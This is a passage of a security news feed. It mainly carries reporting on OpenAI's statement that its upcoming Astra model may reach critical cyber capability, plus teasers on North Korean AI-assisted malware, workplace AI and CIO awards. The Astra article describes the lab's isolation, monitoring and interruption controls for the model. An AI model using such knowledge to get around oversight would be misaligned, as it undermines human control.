<p class="wp-block-paragraph">The company disclosed the assessment following recent internal testing and expert reviews.</p>



<p class="wp-block-paragraph">“Our latest internal evaluations of Astra, one of our upcoming models, over the past few days indicate significant advancements in agentic coding and cybersecurity,” OpenAI said in a <a href="https://openai.com/index/responding-next-frontier-critical-cyber-capabilities/" target="_blank" rel="noreferrer noopener">statement</a>. “These results, in addition to expert assessments, have led us to conclude last night that we cannot rule out critical cyber capabilities under our Preparedness Framework⁠.</p>



<h2 class="wp-block-heading">What has changed</h2>



<p class="wp-block-paragraph">To explain the shift, OpenAI pointed to its internal <a href="https://cdn.openai.com/pdf/18a02b5d-6b67-4cec-ab64-68cdfbddebcd/preparedness-framework-v2.pdf" target="_blank" rel="noreferrer noopener">Preparedness Framework</a>, which tracks how far AI models advance in sensitive areas such as cybersecurity.</p>



<p class="wp-block-paragraph">At the top end of that framework are systems that no longer just assist humans but can act on their own, the company said.</p>



<p class="wp-block-paragraph">“A model reaches the Critical cybersecurity threshold if it can identify and develop functional zero-day exploits of all severity levels in many hardened real-world critical systems without human intervention, or can devise and execute end-to-end novel strategies for cyberattacks against hardened targets given only a high-level desired goal,” the statement added.</p>



<p class="wp-block-paragraph">The company said Astra has not yet been definitively classified at that level, but its early performance is “strong enough” that such a designation cannot be ruled out. Its earlier models, including GPT 5.6 Sol, “have been evaluated for frontier cyber capabilities and assessed at the High (rather than Critical) threshold.”</p>



<p class="wp-block-paragraph">“This is a substantial inflection point,” said Apeksha Kaushik, senior principal analyst at Gartner. “An AI system could autonomously discover vulnerabilities, develop exploits, and execute end-to-end attacks with minimal human guidance.”</p>



<h2 class="wp-block-heading">Why this matters for enterprises</h2>



<p class="wp-block-paragraph">For security teams, the change is not just technical — it affects how attacks may unfold, analysts feel.</p>



<p class="wp-block-paragraph">Kaushik said the pace of progress suggests “practical, real-world exploitation is becoming increasingly feasible,” meaning attackers could automate large parts of the attack process. That reduces the time defenders have to react.</p>



<p class="wp-block-paragraph">“The implication is clear: enterprise security must evolve from reactive to preemptive,” she said, adding that organizations should move toward continuous, AI-driven exposure assessment and predictive analysis.</p>



<p class="wp-block-paragraph">Sanchit Vir Gogia, chief analyst at Greyhound Research, said companies should not wait for a formal label before acting.</p>



<p class="wp-block-paragraph">“OpenAI has said it cannot rule out critical cybersecurity capability in Astra and is treating the model accordingly. That is a precautionary trigger rather than a finished finding,” he said.</p>



<p class="wp-block-paragraph">He added that the focus should shift beyond patching speed. “The measure that matters is defensive response latency. A flat vulnerability queue is no longer a security posture.”</p>



<h2 class="wp-block-heading">What OpenAI is doing now</h2>



<p class="wp-block-paragraph">Based on the development, OpenAI said it is tightening controls around Astra’s development.</p>



<p class="wp-block-paragraph">“We are implementing stricter security controls for higher-capability models,” the company said, including “isolated testing environments, restricted network and tool access, enhanced model weight protections and encryption, additional monitoring and detection capabilities, and sandboxed execution,” OpenAI added I n the statement.</p>



<p class="wp-block-paragraph">It is also “pausing internal activities involving Astra that do not yet meet these strengthened security control requirements.”</p>



<p class="wp-block-paragraph">The company said it has expanded monitoring across how the model is used. “We have implemented universal monitoring for risky actions and misalignment,” it said, adding that systems can “trigger a security response to review and interrupt high-risk activity.”</p>



<h2 class="wp-block-heading">Are the safeguards enough?</h2>



<p class="wp-block-paragraph">Analysts said these steps are necessary, but may not fully address the risks as capabilities improve.</p>



<p class="wp-block-paragraph">“Current safeguards such as restricted environments, continuous monitoring, and external red-teaming are necessary, but the gap between safeguards and emerging threats is increasing,” Kaushik said. She pointed to risks such as prompt injection and weak access controls in AI systems.</p>



<p class="wp-block-paragraph">Gogia said safeguards need to be viewed in the context of the broader system.</p>



<p class="wp-block-paragraph">“A capable model does not operate inside a framework document. It operates inside a system, and systems leak authority through their exceptions,” he said. “Gated access buys defenders time. It does not repeal a capability.”</p>



<p class="wp-block-paragraph">OpenAI said it will work with governments and external safety groups to further test Astra.</p>



<p class="wp-block-paragraph">“We will work with relevant government agencies and select AI safety organizations to test the capabilities for this model,” the company said, adding that it will also share guidance with third-party testing partners. The company said it is disclosing the findings to be transparent about what it called a “potential shift in capabilities.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[KI-„Vibe-Coding“ und Fake-Personalisierung: Wenn Ideen kaum noch nach eigenen wirken]]></title>
<description><![CDATA[LONDON (IT BOLTWISE) – In immer mehr Projekt-E-Mails wirkt die Botschaft „persönlich“ – doch beim Klick in die Details dominiert häufig KI-generierter Inhalt. Der Autor kritisiert damit nicht das kreative Arbeiten selbst, sondern den Vertrauensverlust durch maschinell formulierte Anbahnung. Als A...]]></description>
<link>https://tsecurity.de/de/3713633/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3713633/nachrichtenportal/</guid>
<pubDate>Tue, 11 Aug 2026 00:56:39 +0200</pubDate>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/08/ai-vibe-coding-authenticity.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" loading="lazy" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/08/ai-vibe-coding-authenticity.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/08/ai-vibe-coding-authenticity-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/08/ai-vibe-coding-authenticity-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/08/ai-vibe-coding-authenticity-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/08/ai-vibe-coding-authenticity-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/08/ai-vibe-coding-authenticity-120x120.jpg 120w" sizes="auto, (max-width: 1024px) 100vw, 1024px">LONDON (IT BOLTWISE) – In immer mehr Projekt-E-Mails wirkt die Botschaft „persönlich“ – doch beim Klick in die Details dominiert häufig KI-generierter Inhalt. Der Autor kritisiert damit nicht das kreative Arbeiten selbst, sondern den Vertrauensverlust durch maschinell formulierte Anbahnung. Als Aufhänger dient ein Streit um eine App, die nach Kritikern zu nah an ein Open-Source-Projekt […]</p>
<div><a href="https://www.it-boltwise.de/ki-vibe-coding-und-fake-personalisierung-wenn-ideen-kaum-noch-nach-eigenen-wirken.html">... den vollständigen Artikel <strong>»KI-„Vibe-Coding“ und Fake-Personalisierung: Wenn Ideen kaum noch nach eigenen wirken«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/ki-vibe-coding-und-fake-personalisierung-wenn-ideen-kaum-noch-nach-eigenen-wirken.html">KI-„Vibe-Coding“ und Fake-Personalisierung: Wenn Ideen kaum noch nach eigenen wirken</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Nordkoreas Kimsuky testet lokale KI-Tools für Malware und Angriffsautomatisierung]]></title>
<description><![CDATA[LONDON (IT BOLTWISE) – Der nordkoreanische Hacking-Komplex Kimsuky soll lokale KI-Tools aufgebaut und getestet haben, um sie in seine Angriffsabläufe zu integrieren. Die Beobachter nennen dabei generative KI für Köderdokumente sowie Retrieval-augmented Generation (RAG) als möglichen Hebel für die...]]></description>
<link>https://tsecurity.de/de/3713623/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3713623/nachrichtenportal/</guid>
<pubDate>Tue, 11 Aug 2026 00:56:38 +0200</pubDate>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/08/ai-kimsuky-lokale-ki-tools-malware.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" loading="lazy" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/08/ai-kimsuky-lokale-ki-tools-malware.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/08/ai-kimsuky-lokale-ki-tools-malware-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/08/ai-kimsuky-lokale-ki-tools-malware-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/08/ai-kimsuky-lokale-ki-tools-malware-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/08/ai-kimsuky-lokale-ki-tools-malware-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/08/ai-kimsuky-lokale-ki-tools-malware-120x120.jpg 120w" sizes="auto, (max-width: 1024px) 100vw, 1024px">LONDON (IT BOLTWISE) – Der nordkoreanische Hacking-Komplex Kimsuky soll lokale KI-Tools aufgebaut und getestet haben, um sie in seine Angriffsabläufe zu integrieren. Die Beobachter nennen dabei generative KI für Köderdokumente sowie Retrieval-augmented Generation (RAG) als möglichen Hebel für die Auswertung gestohlener Inhalte. Zusätzlich werden Sprach-zu-Text-Werkzeuge und ein KI-assistiertes Coding-Tool auf der Infrastruktur verortet. Genians sieht […]</p>
<div><a href="https://www.it-boltwise.de/nordkoreas-kimsuky-testet-lokale-ki-tools-fuer-malware-und-angriffsautomatisierung.html">... den vollständigen Artikel <strong>»Nordkoreas Kimsuky testet lokale KI-Tools für Malware und Angriffsautomatisierung«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/nordkoreas-kimsuky-testet-lokale-ki-tools-fuer-malware-und-angriffsautomatisierung.html">Nordkoreas Kimsuky testet lokale KI-Tools für Malware und Angriffsautomatisierung</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Diese Jobs haben auch im KI-Zeitalter Zukunft]]></title>
<description><![CDATA[width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px">Um in der KI-unterwanderten Arbeitswelt zu reüssieren, reicht technologische Expertise allein nicht mehr aus. Taris Tonsa / Shutterstock



Die Warnung, dass Künstliche Intelligenz unsere Arbeit übernimmt, ist allgegenwärti...]]></description>
<link>https://tsecurity.de/de/3713539/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3713539/nachrichtenportal/</guid>
<pubDate>Tue, 11 Aug 2026 00:55:54 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized"> width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption">Um in der KI-unterwanderten Arbeitswelt zu reüssieren, reicht technologische Expertise allein nicht mehr aus. </figcaption></figure><p class="imageCredit">Taris Tonsa / Shutterstock</p></div>



<p class="wp-block-paragraph">Die Warnung, dass Künstliche Intelligenz <a href="https://www.computerwoche.de/article/4172250/diese-it-jobs-sind-am-starksten-von-ki-betroffen.html">unsere Arbeit übernimmt</a>, ist allgegenwärtig. KI-gestützte Coding-Tools übernehmen <a href="https://www.computerwoche.de/article/4094444/junior-entwickler-sind-alles-andere-als-abgehangt.html">Aufgaben von Junior-Entwicklern</a>, leistungsfähige Sprachmodelle verändern die Arbeit von Wissensarbeitern – und mit den Fortschritten bei <a href="https://www.computerwoche.de/article/4206714/7-anwendungsfalle-fur-physical-ai.html" data-type="link" data-id="https://www.computerwoche.de/article/4206714/7-anwendungsfalle-fur-physical-ai.html">Physical AI</a> geraten zunehmend auch körperliche Tätigkeiten in der Industrie und <a href="https://www.computerwoche.de/article/4179873/demnachst-auch-in-munchen-ki-startup-reinigt-kostenlos-die-wohnung.html">im Haushalt</a> in den Fokus der Automatisierung.</p>



<p class="wp-block-paragraph">Doch der technologische Wandel bedeutet nicht zwangsläufig, dass dem Menschen die Arbeit ausgeht. Besonders gefragt bleiben Tätigkeiten, die zwischenmenschliche Interaktion, Empathie, komplexes Denken oder Kreativität erfordern.</p>



<p class="wp-block-paragraph">In diesen Bereichen steige die Nachfrage weiter an und das oft sogar stärker als in Berufen, die durch Automatisierung gefährdet sind, <a href="https://www.livecareer.de/bewerbung/berufe-mit-zukunft" target="_blank" rel="noreferrer noopener">so die Karriereberater von Livecareer</a>.</p>



<h2 class="wp-block-heading">Technische Expertise und menschliche Fähigkeiten</h2>



<p class="wp-block-paragraph">Als Beispiele für solche Tätigkeiten, in denen technologische Expertise allein nicht ausreicht, sondern häufig mit menschlichen Fähigkeiten kombiniert wird, nennen sie unter anderem:  </p>



<ul class="wp-block-list">
<li>Gesundheits- und Pflegeberufe,</li>



<li>Bildung &amp; Training,</li>



<li>Management, Recht &amp; Unternehmensberatung, und</li>



<li>Technologie &amp; Datenanalyse.</li>
</ul>



<p class="wp-block-paragraph">Zukunftsfähige Berufe lassen sich laut LiveCareer oft an folgenden Anforderungen erkennen:</p>



<ul class="wp-block-list">
<li><strong>Hohe soziale und kommunikative Anforderungen</strong>, etwa Empathie und Teamarbeit;</li>



<li><strong>Komplexe Problemlösung und kreative Aufgaben</strong>, die nicht standardisierbar sind;</li>



<li><strong>Fachwissen und Spezialisierung</strong>, die kontinuierlich weiterentwickelt werden müssen;</li>



<li><strong>Menschliche Verantwortung und Entscheidungsfreiheit;</strong></li>



<li><strong>Anpassungsfähigkeit in einer digitalen und vernetzten Arbeitswelt.</strong></li>
</ul>



<p class="wp-block-paragraph">Gefährdet sind aus Sicht von Livecareer dagegen Jobs mit stark repetitiven Tätigkeiten. So ließen sich etwa einfachere Verwaltungsaufgaben, Routine-Datenerfassung oder bestimmte manuelle Tätigkeiten leicht durch KI und Automatisierung ersetzen. In den meisten Fällen fallen die Berufe selbst dabei nicht (komplett) weg, so die Experten, vielmehr verändern sich die Aufgaben.</p>



<p class="wp-block-paragraph">Wer diese Jobs weiter ausführen möchte, muss sich vor allem anpassen, also weiterbilden, neue Fähigkeiten lernen oder sich breiter aufstellen, um auch bessere Chancen auf dem Arbeitsmarkt zu haben.</p>



<h2 class="wp-block-heading">KI und Arbeit: 4 Szenarien</h2>



<p class="wp-block-paragraph">Wie stark solche Anpassungsstrategien tatsächlich greifen, hängt allerdings davon ab, wie schnell sich KI entwickelt – und ob die Arbeitswelt mit diesem Tempo Schritt halten kann. Genau diese beiden Faktoren stellt das World Economic Forum ins Zentrum von <a href="https://www.weforum.org/stories/economic-growth/how-ai-will-affect-work-in-different-industries/" target="_blank" rel="noreferrer noopener">vier Szenarien für die Arbeitswelt bis 2030</a>.</p>



<ul class="wp-block-list">
<li>Im Szenario <strong>„Supercharged Progress“</strong> treffen laut WEF rasante technologische Fortschritte auf eine hohe Bereitschaft der Arbeitswelt, sich auf KI einzustellen. Das Resultat: KI-Systeme übernehmen immer mehr Aufgaben, während sich viele menschliche Tätigkeiten in Richtung Steuerung, Kontrolle und Zusammenarbeit mit intelligenten Systemen verschieben. Daraus kann eine stark KI-geprägte Wirtschaft mit erheblichen Produktivitätsgewinnen entstehen.</li>



<li>Bei <strong>„The Age of Displacement“</strong> entwickelt sich KI ebenfalls exponentiell, doch Unternehmen, Beschäftigte und Bildungssysteme können nicht mithalten. Automatisierung ersetzt zahlreiche Tätigkeiten, ohne dass in gleichem Tempo neue Job-Perspektiven entstehen. Die Folge könnten großflächige Arbeitsplatzverluste, stärkere wirtschaftliche Schwankungen und gesellschaftliche Spannungen sein.</li>



<li>Das Szenario <strong>„Co-Pilot Economy“</strong> zeichnet ein wesentlich kooperativeres Bild. Die technologische Entwicklung verläuft weniger explosionsartig, gleichzeitig ist die Arbeitswelt gut auf KI vorbereitet. Statt Menschen in großem Umfang zu ersetzen, werden KI-Systeme vor allem eingesetzt, um Beschäftigte bei ihrer Arbeit zu unterstützen und ihre Fähigkeiten zu erweitern.</li>



<li><strong>„Stalled Progress“</strong> beschreibt schließlich eine Welt, in der sowohl die KI-Entwicklung als auch die Anpassung der Arbeitswelt stocken. Die Konsequenz: Fehleranfällige KI-Anwendungen und mangelnde Kompetenzen verhindern die erhofften Produktivitätsgewinne.</li>
</ul>



<h2 class="wp-block-heading">Was Arbeitnehmer jetzt tun können</h2>



<p class="wp-block-paragraph">Unabhängig davon, welches Szenario Realität wird, können Beschäftigte schon heute ihre Ausgangsposition verbessern. Livecareer empfiehlt vor allem, digitale Kompetenzen auszubauen und den sicheren Umgang mit KI-Tools zu lernen. Gleichzeitig gewinnen Fähigkeiten an Bedeutung, die sich nur schwer automatisieren lassen: Kommunikation, Kreativität, Teamarbeit und komplexe Problemlösung. Wer zudem flexibel bleibt, praktische Erfahrungen sammelt und Weiterbildungsangebote nutzt, kann sich leichter auf neue Berufsbilder einstellen. Auch ein belastbares berufliches Netzwerk kann helfen, neue Chancen frühzeitig zu erkennen.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Three interviews: system fragility, operational clarity, and Identity for AI agents - Todd Thiemann, Robin Macfarlane, Kyle Sandy - ESW #471]]></title>
<description><![CDATA[Interview 1: Robin Macfarlane from RRMac Associats The Mattress Money Principle: What a 50-Year Veteran Knows About System Fragility In this interview, Robin and Adrian discuss how technology has evolved over the past 50 years. Despite massive technological changes over the decades: the PC revolu...]]></description>
<link>https://tsecurity.de/de/3713530/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3713530/nachrichtenportal/</guid>
<pubDate>Tue, 11 Aug 2026 00:54:39 +0200</pubDate>
<content:encoded><![CDATA[<h3>Interview 1: Robin Macfarlane from RRMac Associats</h3> <p><strong>The Mattress Money Principle: What a 50-Year Veteran Knows About System Fragility</strong></p> <p>In this interview, Robin and Adrian discuss how technology has evolved over the past 50 years. Despite massive technological changes over the decades: the PC revolution, the Internet, smartphones, the Cloud, and now Generative AI - the majority of financial institutions still use mainframes and midrange machines. Why?</p> <p>We explore the reasons why older technology persists alongside the new and the lessons retiring technologists can pass on to new generations inheriting an increasingly diverse tech landscape.</p> <h3>Interview 2 with Kyle Sandy from Logically</h3> <p><strong>Operational Clarity as the New Customer Experience</strong></p> <p>Kyle Sandy joins Adrian to discuss how prioritizing resilience affects how organizations should plan for incident response. In the past, security teams were focused on prevention and limiting breach damage. Today, boards want to know how long it will take to recover operations.</p> <p>The interview wraps up with a discussion of the right and wrong way to handle a breach and the three most important things every company must get right in order to handle an incident well.</p> <h3>Interview 3 with Todd Thiemann from Omdia</h3> <p><strong>AI Agents and Identity Security: How Enterprises Are Rewriting the Rules</strong></p> <p>Todd joins ESW with some eye-opening survey insights on the topic of IAM for AI agents. While cybersecurity conversations about internal AI use often revolve around the SOC and security operations, Omdia surveyed identity professionals for a more holistic enterprise perspective.</p> <p>Unsurprisingly, AI agent use is as diverse as enterprise business units. The surprises are around where the budget comes from for these AI projects, and how authentication is handled.</p> <p>Visit <a rel="noopener" target="_blank" href="https://www.securityweekly.com/esw">https://www.securityweekly.com/esw</a> for all the latest episodes!</p> <p>Show Notes: <a rel="noopener" target="_blank" href="https://securityweekly.com/esw-471">https://securityweekly.com/esw-471</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI locks down Astra over potential critical cyber capabilities]]></title>
<description><![CDATA[OpenAI’s internal evaluation of its upcoming model, Astra, found significant advances in agentic coding and cybersecurity, leading the company to conclude that it cannot rule out the model reaching the critical capability level for cybersecurity under its Preparedness Framework. The Preparedness ...]]></description>
<link>https://tsecurity.de/de/3713515/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3713515/nachrichtenportal/</guid>
<pubDate>Tue, 11 Aug 2026 00:53:46 +0200</pubDate>
<content:encoded><![CDATA[<p>OpenAI’s internal evaluation of its upcoming model, Astra, found significant advances in agentic coding and cybersecurity, leading the company to conclude that it cannot rule out the model reaching the critical capability level for cybersecurity under its Preparedness Framework. The Preparedness Framework, first published in December 2023, outlines how OpenAI evaluates frontier AI risks and determines the safeguards required before deploying increasingly capable models. It identifies high-risk capability areas, including cybersecurity, biological and chemical threats, … <a href="https://www.helpnetsecurity.com/2026/08/10/openai-astra-critical-cyber-capabilities/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2026/08/10/openai-astra-critical-cyber-capabilities/">OpenAI locks down Astra over potential critical cyber capabilities</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CIO 100 Award winners spotlight IT’s power to transform]]></title>
<description><![CDATA[Each year the CIO 100 Awards showcase outstanding IT initiatives, and every year they illustrate the power and potential of technology to transform how people work, how organizations perform, and the value they offer to customers.



The 2026 cohort of winners is no different. Each one demonstrat...]]></description>
<link>https://tsecurity.de/de/3713501/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3713501/nachrichtenportal/</guid>
<pubDate>Tue, 11 Aug 2026 00:53:31 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Each year the <a href="https://event.foundryco.com/cio100-symposium-and-awards/awards/">CIO 100 Awards</a> showcase outstanding IT initiatives, and every year they illustrate the power and potential of technology to transform how people work, how organizations perform, and the value they offer to customers.</p>



<p class="wp-block-paragraph">The <a href="https://www.cio.com/article/220017/us-cio-100-winners-celebrating-it-innovation-and-leadership.html">2026 cohort of winners</a> is no different. Each one demonstrates how IT executives and their teams successfully move from ideation to deployment to scaling a solution for the future, overcoming challenges and driving adoption along the way to ensure their organization gets a return on its investment.</p>



<p class="wp-block-paragraph"><strong>[ Interested in meeting and learning from all CIO 100 winners? Join us next week at CIO 100 Awards &amp; Conference in Frisco, TX. Limited seats remain! </strong><a href="https://register.foundryco.com/mq3MaX?rt=5FJf1djA6UC8VitjiXqAMg&amp;utm_source=Editorial&amp;utm_campaign=CIOArticle&amp;utm_medium=CIOArticle&amp;RefId=CIOArticle"><strong>Register here</strong></a><strong> ]</strong></p>



<p class="wp-block-paragraph">The winning initiatives come from a range of industries and utilize a host of technologies to achieve their goals, as is the case annually. A growing proportion of these stand-out projects leverage artificial intelligence, raising the bar on the art of the possible for all IT departments.</p>



<p class="wp-block-paragraph">The following 10 award-winning projects serve as representatives for the outstanding work done by all the 2026 honorees.</p>



<h2 class="wp-block-heading">ABB democratizes AI agent creation and deployment</h2>



<p class="wp-block-paragraph"><strong>Organization:</strong> ABB</p>



<p class="wp-block-paragraph"><strong>Project:</strong> ABBY — AI Agentic Platform for Workforce Transformation</p>



<p class="wp-block-paragraph"><strong>IT leader:</strong> <a href="https://www.linkedin.com/in/vikke-kandell/">Vikke Kandell</a>, CIO</p>



<p class="wp-block-paragraph">IT leaders at ABB, a manufacturer, had some big hurdles to clear when it came to building an AI strategy.</p>



<p class="wp-block-paragraph">They had to overcome employee fears that AI would take away jobs, the potentially high cost of AI vendor licenses, and pressure from investors, customers, and executives to advance the use of AI in the enterprise.</p>



<p class="wp-block-paragraph">“We looked at this and asked, ‘How do we address all this?’ and build something that the company is proud of,” says Babu Kuttala, vice president of data analytics and AI.</p>



<p class="wp-block-paragraph">The answer is ABBY, an AI agentic platform that enables employees to create and deploy specialized AI agents for specific business tasks.</p>



<p class="wp-block-paragraph">To build ABBY, Kuttala and his team used best-of-breed LLMs (about 25 in total). They built a centralized orchestration layer using generative AI that integrates internal knowledge bases with external ecosystems, creating a unified platform where agents can access enterprise data, understand required actions, and execute tasks across multiple systems. And they created preconfigured skills so that employees could build agents tailored to their workflows without having to code.</p>



<p class="wp-block-paragraph">ABBY was rolled out in 2025 to 100 users but is now used by 63,000 (more than 75% of the company’s workforce, Kuttala notes) with an average of 10,000-plus workers using it daily. IT continues to add LLMs and capabilities to expand use of ABBY even further, Kuttala says.</p>



<h2 class="wp-block-heading">Belcorp modernizes manufacturing with Smart Factory</h2>



<p class="wp-block-paragraph"><strong>Organization:</strong> Belcorp</p>



<p class="wp-block-paragraph"><strong>Project:</strong> QPlant — Smart Factory</p>



<p class="wp-block-paragraph"><strong>IT leader:</strong> <a href="https://www.linkedin.com/in/venkatgopalan/">Venkat Gopalan</a>, Chief Digital, Data, and Technology Officer</p>



<p class="wp-block-paragraph">Legacy processes were limiting Belcorp’s ability to scale and compete. Its manufacturing relied on ERP-driven processes with limited shop-floor automation and weak connectivity across production, packaging, quality, and maintenance. The company depended heavily on manual records and post-process reconciliation, resulting in fragmented data, limited real-time insight, inefficiencies, and higher risks for errors.</p>



<p class="wp-block-paragraph">Smart Factory changed all that. The IT initiative reimagined how manufacturing teams work “by creating a connected, data-driven environment where production, quality, maintenance, and operations are aligned around real-time information and standardized execution,” says Venkat Gopalan, chief digital, data, and technology officer.</p>



<p class="wp-block-paragraph">At Smart Factory’s core is a manufacturing execution system that orchestrates production workflows, quality processes, and operational execution, he explains. IoT-enabled equipment integration and a centralized SCADA platform provide real-time visibility into shop-floor operations, while electronic batch records digitize production execution, strengthen traceability, and reinforce compliance by design.</p>



<p class="wp-block-paragraph">Integrating those operational technologies with the company’s enterprise platforms was another critical component of success, Gopalan says, creating a trusted flow of real-time data across manufacturing, quality, maintenance, and business systems. “This connected architecture transformed isolated data into actionable insights, enabling faster decision-making, greater operational visibility, and continuous improvement across the manufacturing lifecycle,” he adds.</p>



<p class="wp-block-paragraph">The initiative generated more than $1 million in financial benefits in its first year alone.</p>



<p class="wp-block-paragraph">“Most importantly, Smart Factory established the digital foundation for the future of manufacturing at Belcorp,” Gopalan says. “With real-time operational data and connected systems now in place, we’re well positioned to accelerate advanced analytics, AI-driven optimization, predictive maintenance, and other Industry 4.0 capabilities that will continue delivering value for years to come.”</p>



<h2 class="wp-block-heading">Cohesity replatforms post-acquisition for commercial growth</h2>



<p class="wp-block-paragraph"><strong>Organization:</strong> Cohesity</p>



<p class="wp-block-paragraph"><strong>Project:</strong> Lead to Cash Replatforming Program (Veritas Integration)</p>



<p class="wp-block-paragraph"><strong>IT leader:</strong> <a href="https://www.linkedin.com/in/brianspanswick/">Brian Spanswick</a>, CIO</p>



<p class="wp-block-paragraph">Cohesity set an ambitious objective: Complete an enterprise-scale lead-to-cash replatform in under six months.</p>



<p class="wp-block-paragraph">That’s a tight timeline for any replatforming initiative, but Cohesity’s project had another layer of complexity. It followed Cohesity’s December 2024 acquisition of Veritas, a company twice its size in revenue, leaving Cohesity to integrate the majority of a global enterprise revenue engine into its own operating model without disrupting customers, partners, or sellers.</p>



<p class="wp-block-paragraph">“We had to bring the two companies together, merge the workforces together, and create an overall harmonized organization and operating infrastructure platform,” says Eric Brown, who as CFO and COO led the project.</p>



<p class="wp-block-paragraph">The program migrated heavily customized CRM, CPQ, PRM, ERP, and subscription platforms (some of which were “very brittle, very bespoke,” Brown says) to a unified SaaS CRM, CPQ, and ERP environment with uninterrupted selling, billing, and partner operations.</p>



<p class="wp-block-paragraph">This was no lift-and shift, Brown stresses. “It was a business process optimization project as well. We want to run very efficiently, so we questioned everything and used the migration process to simplify and streamline the business in every possible respect.”</p>



<p class="wp-block-paragraph">The initiative enabled continuity for 13,000-plus customers, protected revenue during integration, and established a scalable commercial foundation for future growth.</p>



<p class="wp-block-paragraph">Brown cites several factors that contributed to success. First, leadership was upfront about what it would take to meet the deadline, a process that involved carefully prioritizing the capabilities that would appear in the first iteration. Leadership also streamlined decision-making, establishing office hours that “ran with military precision” to handle issues. And the company selected a specialized partner, requiring its top talent be assigned to Cohesity.</p>



<h2 class="wp-block-heading">Dairyland Power goes agentic to protect field crews</h2>



<p class="wp-block-paragraph"><strong>Organization:</strong> Dairyland Power Cooperative</p>



<p class="wp-block-paragraph"><strong>Project:</strong> ODIN — Organizational Effectiveness Agentic AI</p>



<p class="wp-block-paragraph"><strong>IT leader:</strong> <a href="https://www.linkedin.com/in/nate-melby-0199712/">Nate Melby</a>, VP and CIO</p>



<p class="wp-block-paragraph">Dairyland Power Cooperative had amassed a large collection of field observations, incident reports, near-misses, safety rules, and work methods that could yield insights into processes and practices that could help protect its workers.</p>



<p class="wp-block-paragraph">But the insights were essentially out of reach, trapped in siloes.</p>



<p class="wp-block-paragraph">Dairyland’s organizational effectiveness team turned to CIO Nate Melby for help unlocking those insights. Melby then turned to agentic AI, recognizing that the technology could address the team’s need to make better use of its data.</p>



<p class="wp-block-paragraph">“This was about finding insights on how to work more safely,” Melby says. “It’s about preventing incidents.”</p>



<p class="wp-block-paragraph">The collaboration between the two teams created ODIN, the first agentic AI implementation of its kind in the electric utility industry.</p>



<p class="wp-block-paragraph">Focused on worker safety, ODIN autonomously connects the collective safety knowledge of the organization and delivers actionable insights directly to field crews at the moment work is planned.</p>



<p class="wp-block-paragraph">ODIN was developed through a hybrid approach that combined an agentic AI platform and Dairyland’s internal private generative AI platform called VoltWrite. ODIN leverages LLMs, retrieval-augmented generation, and a coordinated swarm of autonomous agents.</p>



<p class="wp-block-paragraph">Agents work together to analyze internal safety data, performance history, work practices, and safety rules and then synthesize the information into clear guidance on the safest way to perform specific tasks.</p>



<p class="wp-block-paragraph">ODIN has produced results, including a reduction in OSHA recordable injuries and improvements in the quality and consistency of pre-job safety briefings.</p>



<p class="wp-block-paragraph">ODIN was deployed in early 2025 for use by Dairyland’s workers in transmission construction and electrical maintenance, which are the highest-risk work areas. Dairyland is looking to expand ODIN’s use to other teams.</p>



<h2 class="wp-block-heading">Dow’s digital sustainability ledger drives low-carbon sales</h2>



<p class="wp-block-paragraph"><strong>Organization:</strong> Dow</p>



<p class="wp-block-paragraph"><strong>Project:</strong> Carbon Footprint Ledger</p>



<p class="wp-block-paragraph"><strong>IT leader: </strong><a href="https://corporate.dow.com/en-us/about-dow/leadership/debra-bauler.html">Deb Bauler</a>, Chief Information and Digital Officer</p>



